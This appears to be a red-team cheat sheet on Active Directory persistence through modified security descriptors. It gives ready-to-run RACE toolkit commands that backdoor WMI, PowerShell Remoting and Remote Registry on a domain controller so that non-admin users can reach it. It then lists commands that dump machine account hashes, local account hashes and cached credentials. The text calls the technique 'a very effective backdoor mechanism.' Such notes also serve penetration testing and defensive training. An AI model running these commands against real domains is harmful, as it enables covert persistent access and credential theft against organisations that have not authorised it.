Security Descriptors

• It is possible to modify Security Descriptors (security information like Owner, primary group, DAccess Control Model, SACL) of multiple remote access methods (securable objects) to allow access to non-admin users

• A very effective backdoor mechanism

• Security Descriptor Definition Language (SDDL) defines the format which is used to describe a security descriptor. SDDL uses ACE strings for DACL and SACL: ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid

• ACE for built-in administrators for WMI namespaces A;Cl;CCDCLCSWRPWPRCWD;;;SID

• ACLs can be modified to allow non-admin users access to securable objects. Using the RACE toolkit: C:\AD\Tools\RACE-master\RACE.ps1

Using WMI

Set-RemoteWMI -SamAccountName username -Verbose

Set-RemoteWMI -SamAccountName username -ComputerName domain-controller -namespace 'root\cimv2'

Set-RemoteWMI -SamAccountName username -ComputerName domain-controller -Credential Administrator -namespace 'root\cimv2' -Verbose

Set-RemoteWmi -SamAccountName username -ComputerName domain-controller-namespace 'root\cimv2' -Remove -Verbose

Using RACE toolkit

PS Remoting backdoor

Set-RemotePSRemoting -SamAccountName username -Verbose

Set-RemotePSRemoting -SamAccountName username -ComputerName domain-controller -Verbose

Set-RemotePSRemoting -SamAccountName username -ComputerName domain-controller -Remove

Remote Registry

Add-RemoteRegBackdoor -Computername domain-controller -Trustee username -Verbose

Get-RemoteMachineAccountHash -ComputerName domain-controller -Verbose

Get-RemoteLocalAccountHash -ComputerName domain-controller -Verbose

Get-RemoteCachedCredential -ComputerName domain-controller -Verbose